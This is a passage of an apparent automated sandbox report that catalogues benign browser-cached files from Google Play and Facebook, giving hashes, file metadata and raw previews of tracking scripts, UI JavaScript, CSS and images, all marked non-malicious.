                                                                                                                                                                                                                                  SHA-512:0F286EC7F0FBD715585F6A643C3D9E2842FFF33931C5DE54B6D4CD3FC84A65A4C1429725D79C5230B38B11DEEE265B5F4A9355DEB68BA41E86246122111572A1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?.....6.mU.....S.eX.......{.p.....kF.1....t.z...*...:$....B.:.:.......?....V..C.5.....S.....2./...]...L.fl..9#./.\.'...A..X0..-.P.'.<.i...(.|.G...H.....>I2.(d.K...B.I..D..*..g-...n.9(. .....sJ>........T.!"r.^.A..'#.4..+.I..l.^.....X....../.S.`..<..~.w=.....m.6.bl.N...bl.6?_.E..D._@P..N.....Y.Rf.T..h.v.....2..T.((...5.k.o...#.fCY~../...3T.TK5.P[Zn....s..G#R4.M...,.j.^.NMJS..::..-,jk..LNH.1h......-.h.F..7....Ym...............:..vH.Nh..4....t..G&.d...&.m.g......H...mi....F:..n.;....o..6..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):265791
                                                                                                                                                                                                                                  Entropy (8bit):5.572589898486432
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:KjJpmFU7Cli04d7G3BsEemvevNnH0fxnQ6:YyW7C4nhiZ7
                                                                                                                                                                                                                                  MD5:68D5ED4AF73B8B5AC42A2167AD1C002A
                                                                                                                                                                                                                                  SHA1:B5E4402EC4250D98554E0848880D93D5FEF3E793
                                                                                                                                                                                                                                  SHA-256:D0B8E0DE80F2EF33C32F3AAD6BE8EFD233BD421CDAB8D4E1A038849650EA1F9F
                                                                                                                                                                                                                                  SHA-512:73BDCF683B814DF9815C5C1E3F4C3BA7B0F12BBFBF4E77FB78313C388CB9A4B557EAC2EE8A9DF456672C6603F4B4ED7D029FA438FAE08D3E38C776967951F725
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":16,"vtp_rules":["list","play\\.google\\.com"],"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","play\\.google\\.com"],"tag_id":12},{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8243)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10408
                                                                                                                                                                                                                                  Entropy (8bit):5.228704012543909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:eZH7kUk70Eb1QAUf8HYTevU1gST4wLxr2:eRkR96ApHY2STr2
                                                                                                                                                                                                                                  MD5:74F18E69FCEEB4513B9F24322BE7386E
                                                                                                                                                                                                                                  SHA1:FE37CB92776F387DB632472296B0ADDEB815DD55
                                                                                                                                                                                                                                  SHA-256:E3FDF2DDBE34D56ED6DB667544576B0821399F47124E09DC9671DD62CFD1DD28
                                                                                                                                                                                                                                  SHA-512:7FAE4FBD35068C64252A7645D66FF19CFAF6FE02302A11070E503B315F58D12D48055A59DC72E7970E2FE0435D5095B6DE7FD61FA8C8DCCA07EC4DC376876B2D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/V9vdYColc4k/. */.__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};var h={exports:d};function i(){h.exports=g}var j=!1;function k(){j||(j=!0,i());return h.exports}function c(a){switch(a){case void 0:return k()}}e.exports=c}),null);.__d("react",["react-0.0.0"],(function(a,b,c,d,e,f){e.exports=b("react-0.0.0")()}),null);./**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("resize-observer-polyfill-1.5.1",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.ResizeObserver=c()})(this,function(){var b=function(){if(typeof Map!=="undefined")return Map;function a(a,b){var c=-1;a.some(function(d,a){if(d[0]===b){c=a;return!0}return!1});return c}return function(){function b(){this.__entries__=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3079)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7366
                                                                                                                                                                                                                                  Entropy (8bit):5.321790025737973
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Goi9TDfbkVomRHx+tvD1btkzPRfk+sGQFvMmqJw:ygVtW71bG1fk+sG6vNT
                                                                                                                                                                                                                                  MD5:5EA6E5C1344F9A72501CABA99893015A
                                                                                                                                                                                                                                  SHA1:B4349BDFF54B80FED5EA1D1E7BBD62661E8ACC9D
                                                                                                                                                                                                                                  SHA-256:7ED8D119427D4C430921861A2E4887F5224A8BB23A00EEFB525FC7E747C8E82E
                                                                                                                                                                                                                                  SHA-512:50C49A0018B906FCE975ACFDB11FCA7E290C7C57E02AF7770543F44F5050FE678C63FA6EB499CE4C95AC096C13D18C66195DE026060170B057A2DA37920E2B02
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:var __ember_auto_import__.!function(){var e,n,t,r,o,i={90933:function(e,n,t){e.exports=function(){var e=_eai_d,n=_eai_r.function r(e){return e&&e.__esModule?e:Object.assign({default:e},e)}window.emberAutoImportDynamic=function(e){return 1===arguments.length?n("_eai_dyn_"+e):n("_eai_dynt_"+e)(Array.prototype.slice.call(arguments,1))},window.emberAutoImportSync=function(e){return n("_eai_sync_"+e)(Array.prototype.slice.call(arguments,1))},e("@amp/affiliate-util",[],(function(){return r(t(2353))})),e("@amp/foundation/-internals/network",[],(function(){return r(t(73624))})),e("@amp/foundation/-internals/storage",[],(function(){return r(t(92141))})),e("@amp/media-api-config-amp-books-realm",[],(function(){return r(t(52215))})),e("@amp/media-api-config-amp-podcasts-realm",[],(function(){return r(t(61384))})),e("@amp/media-api-config-apps-realm",[],(function(){return r(t(61069))})),e("@amp/media-api-legacy",[],(function(){return r(t(89176))})),e("@amp/web-app-components/custom-elements/locale
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13410)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34085
                                                                                                                                                                                                                                  Entropy (8bit):5.435704551331771
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:BvKS9nEmwgCl8m84sBjX/ECRTLJMyECvwcZ+/lME2xngK3pX0Zl33t1SDCKc0Rq9:119EFl84sBjCyQoRCZBRgbO
                                                                                                                                                                                                                                  MD5:55A61069B39F2F3F12CC81A90863870B
                                                                                                                                                                                                                                  SHA1:6DAC0396D28002872C4DE3FB43B12ABA2EC95C17
                                                                                                                                                                                                                                  SHA-256:2B16C355C8A82BD130D62F86AEEAB7B8901EDADDF560F06B546F4A3A8D6A849D
                                                                                                                                                                                                                                  SHA-512:582905B7F4865B393DCE75F19F4B4D7467D629803F8D5E2178E8AE760DAFF934FC2F7CDAEE20D3964A2F882B2B1D9775D5AA2B5D3BD57182030354C0B185FD23
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("DevsiteAudienceNetworkTrackingPixels",["Event"],(function(a,b,c,d,e,f,g){"use strict";!function(a,b,c,d,e,f,g){if(a.fbq)return;e=a.fbq=function(){e.callMethod?e.callMethod.apply(e,arguments):e.queue.push(arguments)};a._fbq||(a._fbq=e);e.push=e;e.loaded=!0;e.version="2.0";e.queue=[];f=b.createElement(c);f.async=!0;f.src=d;g=b.getElementsByTagName(c)[0];g.parentNode.insertBefore(f,g)}(window,document,"script","https://connect.facebook.net/en_US/fbevents.js");var h="1668333663438923";function a(){window.fbq("init",h)}function b(a,b){window.fbq("trackCustom",a,babelHelpers["extends"]({},b))}function d(a,b,d,e){c("Event").listen(d,e,function(){window.fbq("trackCustom",a,babelHelpers["extends"]({},b))})}g.init=a;g.track=b;g.setupEventTracker=d}),98);.__d("DevsitePartnershipsTrackingPixels",["Event"],(function(a,b,c,d,e,f,g){"use strict";!function(a,b,c,d,e,f,g){if(a.fbq)return;e=a.fbq=function(){e.callMethod?e.callMethod.apply(e,arguments):e.queue.push(arguments)};a._
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17135)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):59956
                                                                                                                                                                                                                                  Entropy (8bit):5.264511741037863
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:n9txPZhgztxqYWkfk2iXUymBqBVvjogt4+wXZs8n1i+wcHuZRsF7d6BOLQuR4gI7:Hhwt2woZmo
                                                                                                                                                                                                                                  MD5:FC79B275417070FC0052283D97BB5B31
                                                                                                                                                                                                                                  SHA1:0E53644F25080A5E627B6EBA7CD265DE4AD4C7D2
                                                                                                                                                                                                                                  SHA-256:F66EF0A2BC1E35C7FDBC6DD68862D6FC17AB43956C7C6FE1BC39AD9892D7A168
                                                                                                                                                                                                                                  SHA-512:2212C600F5EBBCAFAFDEA64C6DB899716A09578C7F718FBF43D82DDDD5DFA8D10AA37AE8DFB9868CBBF563F278E88C1180A0D6D4CD8E3F82B64F25D8EC2EB7E1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-shift");function a(){if(!g)return null;var a=0,b=0,c=[],d=new window.PerformanceObserver(function(d){for(var d=d.getEntries(),e=Array.isArray(d),f=0,d=e?d:d[typeof Symbol==="function"?Symbol.iterator:"@@iterator"]();;){var g;if(e){if(f>=d.length)break;g=d[f++]}else{f=d.next();if(f.done)break;g=f.value}g=g;if(!g.hadRecentInput){var h=c[0],i=c[c.length-1];b&&g.startTime-i.startTime<1e3&&g.startTime-h.startTime<5e3?(b+=g.value,c.push(g)):(b=g.value,c=[g]);b>a&&(a=b)}}});d.observe({buffered:!0,type:"layout-shift"});return function(){d.disconnect();return a}}f.getCLSCallback=a}),66);.__d("getReactComponentDisplayName",[],(function(a,b,c,d,e,f){"use strict";function a(a){var b=a.displayName;if(b!=null)return b;return a.name!=null?a.name:"Rea
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 17 x 569, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2936
                                                                                                                                                                                                                                  Entropy (8bit):7.492824796189044
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Yzg8aI9H81I9fkWIJrZ0TmIWHXU7TILF8qUx9pDshFNVR9WzxogKEuMOXJokI:l8aEc69f9wZ0DgF7Ux9xsd9AbVR
                                                                                                                                                                                                                                  MD5:C52099A3430BD9F2A3F30613702ECD1D
                                                                                                                                                                                                                                  SHA1:3D93D69D3A7A0485CD8678DAF7C729DFB4E7A93C
                                                                                                                                                                                                                                  SHA-256:05E39A5F006C8AFE017A099E13E57762C6CFB42BDE83DD7FBF622D04AE483D5C
                                                                                                                                                                                                                                  SHA-512:FE760FD5C097987F1991B06406FA26FDE9B89755305FDC1358B12E3C99BA47832561499EB9977C3DB09EEB5C4181F61F0E4C5DA9EDAF6DEAC5681BFB8434FED8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/ghLiHO2V3N4.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......9.....p.!.....PLTEGpL......JNU777`gq.........BGO`gq...@DJ.........`gq...JNUHLSJNU......`gq......JNU.........`gq.................JNUJNU........JNU...JNUJNU......`gqJNUJNU...JNU......BGO.....777.....777BGO...`gq...bgo>..>..>..>..>..JNU...............JNU......JNU...DHO`gq.........`gqJNUKOV........KOVRW_...............JNU..........................`gq......>.......................`gq...777...BGO...777......>...........JNU..........................`gq...............`gq.........JNU......JNU`gq........................`gq`gq.........JNU...`gq...JNU...........>...........KOV...`gq............`gqKOV........................>..`gq...`gq...............JNUJNUJNU.........JNU...>..>..JNU...JNU............`gq`gq............`gq`gqJNU>.....>..>........JNU>..`gq........BGO777.........f.6m....tRNS.............:p....:.......e...;..lll........I.L........llllll....d.p.Ld.....d:......<T......t........:.88.....6....::::....d.x.......m.....g.E...jXz.....M<*.$(\$.<."`NzbbL..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (503)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                  Entropy (8bit):5.378964924494721
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:kRZTFy3IGY2fILYK+Y8krzOHhtruHsIm6WYsqeGq/fG/AvKiGIcPGjLkXrPRTHuS:kzeIj2fIrLzCNZfhqefnSScck7pKwrl
                                                                                                                                                                                                                                  MD5:3289AE1B94D52FDA08D9065EB550A90B
                                                                                                                                                                                                                                  SHA1:E0C03C485DB53F33B99E2B037B0B27E717227497
                                                                                                                                                                                                                                  SHA-256:D7237D3CE82DB38913B409BF9D6E8B7F224E8C2C9D7A5264FD7428E2C0DBA6A8
                                                                                                                                                                                                                                  SHA-512:0DDC581CD6D88F133117BB21CEC7772A53AF141F801A9931C177A60AE2467E6367EA1C671875BD9F8E6AEB672A6956F7F419A634CD6E4F6FC192A0672CDFFD2A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,CvxVpd,DRmmld,EEDORb,EFQ78c,ElYdAc,FCpbqb,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,J22eF,JH2zc,JNoxi,JWUKXe,KUM7Z,Kfp2G,L1AAkb,LCkxpb,LEikZe,LRovxc,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PAQZbb,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RjJvI,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,WhJNk,Wt6vjf,XVMNvd,Y413Bc,YTx6oe,Z5uLle,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fI4Vwc,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,hhhU8,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lDZ2Fb,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,mzLjxc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sJhETb,sOXFj,soHxf,t1sulf,tBvKNb,tKHFxf,uj8DUc,vNKqzc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=jZ2Ncd"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.RBa=_.B("jZ2Ncd",[_.QBa,_.Lk]);._.u("jZ2Ncd");.var gSc=function(a){return a.complete?_.MV(!0):_.XV(_.RV(_.TV(a,"load"),_.QV(()=>!0)),_.RV(_.TV(a,"error"),_.QV(()=>!1)))},hSc=async function(a,b){await a.ka;if(!(b>a.ma().el().scrollWidth*1.3||a.H)&&a.N.H){a.H=!0;try{const g=await _.eSc(a.N);if(g?.Wf()){var c=a.Np.H,d=c.Vd().concat(g.Wf().Vd()),e=a.Np;var f=_.Yg(c,1,d);e.H=f;a.ek.Wg(a.ma().el(),a.Np).execute()}}finally{a.H=!1}}},iSc=class extends _.ys{static Ia(){return{model:{VC:_.fSc},service:{ek:_.aS},soy:{Np:_.PMc}}}constructor(a){super(a.ta);.this.N=a.model.VC;this.Np=a.soy.Np;this.ek=a.service.ek;this.ka=_.WGb(_.RV(_.qHb(...this.ma().find("img").je.slice().map(gSc)),_.$V(2)));this.H=!1}V(a){hSc(this,a.data)}};_.V(iSc.prototype,"B6UJxc",function(){return this.V});_.Gs(_.RBa,iSc);._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1219)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15418
                                                                                                                                                                                                                                  Entropy (8bit):5.683300889843218
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:PS/H567fwwhUwQgYjy9IG7LGtlf4sDogS/v4MQaeX3MMae:PS/HITw+UwQXjy6GPGtlf4JtX4M5eMMT
                                                                                                                                                                                                                                  MD5:68FBCA53C59CF902DB1ECB55A708C11A
                                                                                                                                                                                                                                  SHA1:9A41100144682430B485EF1BB17652CBFA6BD285
                                                                                                                                                                                                                                  SHA-256:6442CE155C812D4337537DC493008167B1801005CF85C824CDECD1777049D766
                                                                                                                                                                                                                                  SHA-512:7886FC30C761A04B8ACD8C65A8F1AEF419E1903B0AC622209E1D0CB55FBF548A285FF24EF11E5635F3B8D8A145CE500AD8226429DB913E0E611288EC3FC1FABA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=J22eF"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.asc=function(a){let b="";if(a!=null&&a.H()>0){let c=_.US(new _.TS("{COUNT,plural, =1{1\u00a0\u043e\u0446\u0435\u043d\u043a\u0430}one{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043a\u0430}few{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043a\u0438}many{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043e\u043a}other{{LOCALIZED_COUNT}\u00a0\u043e\u0446\u0435\u043d\u043a\u0438}}"),{COUNT:a.H(),LOCALIZED_COUNT:""+a.N()});b+='<span class="'+_.T("")+'" aria-label="'+_.T(c)+'">'+_.Q(a.N())+."</span>"}return(0,_.P)(b)};._.GFc=function(a,b,c,d,e,f,g){a=""+_.jX(a,d,c,void 0,b,e,void 0,void 0,(0,_.Jo)('alt="'+_.T("\u0421\u043a\u0440\u0438\u043d\u0448\u043e\u0442")+'" itemprop="image"'),g,f);return(0,_.P)(a)};.var LGc=function(a,b){return b&&b.H()?""+Math.round(310*b.H().N()/b.H().H()):""+a};var MGc=function(a,b,c,d){var e="";c&&_.R(b)&&(d=_.R(d)?_.Uo(d):"",a=""+_.rZ({navigation:c,bu:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1160)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9187
                                                                                                                                                                                                                                  Entropy (8bit):5.266842047147773
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Agj1KySQPgUbvhZ6Jv6zH+DcF5TXdPkHyFHeFtnnHTkK1Fr7c5JYORZwLPoMQpOx:ZjJdbvivgHxlPJ0Tkm6YBapU
                                                                                                                                                                                                                                  MD5:5752D105EF41EE936D900C27042135DA
                                                                                                                                                                                                                                  SHA1:D13E22CAE94DD18BCEB94EAEDEBAC5CC324A905E
                                                                                                                                                                                                                                  SHA-256:1134D58118B3F3BEDDBDF0D2513363FDD34192AB718C28D425A66D5FF42594E6
                                                                                                                                                                                                                                  SHA-512:FCA279604EBA0691F23B0AAAD54C50E598D12ACDFD84690A5E9232D89AD02239BBF6F19A451B6703C4E00FF31212F33FEB092628FC65BA0A9B7AEA28AFADBACA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css"
                                                                                                                                                                                                                                  Preview:..div._3qw{height:auto;left:0;min-height:100%;position:absolute;right:0;top:0;z-index:400}._31e{position:fixed!important;width:100%}.webkit ._42w{position:absolute;top:0;visibility:hidden;width:1px}._3ixn{bottom:0;left:0;position:fixed;right:0;top:0}._3qw ._3ixn{background-color:rgba(255, 255, 255, .8)}._3qx ._3ixn{background-color:rgba(0, 0, 0, .9)}._4-hy ._3ixn{background-color:rgba(0, 0, 0, .4)}._99rc ._3ixn{-webkit-backdrop-filter:blur(20px);backdrop-filter:blur(20px);background-color:rgba(0, 0, 0, .5)}.._42ft{cursor:pointer;display:inline-block;text-decoration:none;white-space:nowrap}._42ft:hover{text-decoration:none}._42ft+._42ft{margin-left:4px}._42fr,._42fs{cursor:default}._afhc{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute;white-space:nowrap;width:1px}.._2agf{word-wrap:normal}._2agf._4o_4{display:inline-flex}._55pe{display:inline-block;overflow:hidden;text-overflow:ellipsis;vertical-align:top;white-space:nowrap}.form{margin:0;padding:0}label{color:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15742
                                                                                                                                                                                                                                  Entropy (8bit):7.987435431620976
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rSgE/rsWBEBVleHQZk5PtkJ8ydwFMQbvEnSideDbE:WnrlBEBVliQSPtkJ8AwSQjecQ
                                                                                                                                                                                                                                  MD5:0CA92FFEFA961F83064FE5FEE52C99DD
                                                                                                                                                                                                                                  SHA1:59C5D5F1821274B00E103DBA07CDDC857C4B42A8
                                                                                                                                                                                                                                  SHA-256:F32E8E7F4D7DAA42569D62624C20063A956DBCA27A660BF0F0B28BB55F419CE7
                                                                                                                                                                                                                                  SHA-512:3CBD1FE45B04240F6A00560722759D17A0C77F1F7B2B11FFAA3AF744907DEF510643B8FE2D90BAC3135FF29749BC4AAFCB2DEC71BA57E0BDF6B7B172CD0CC490
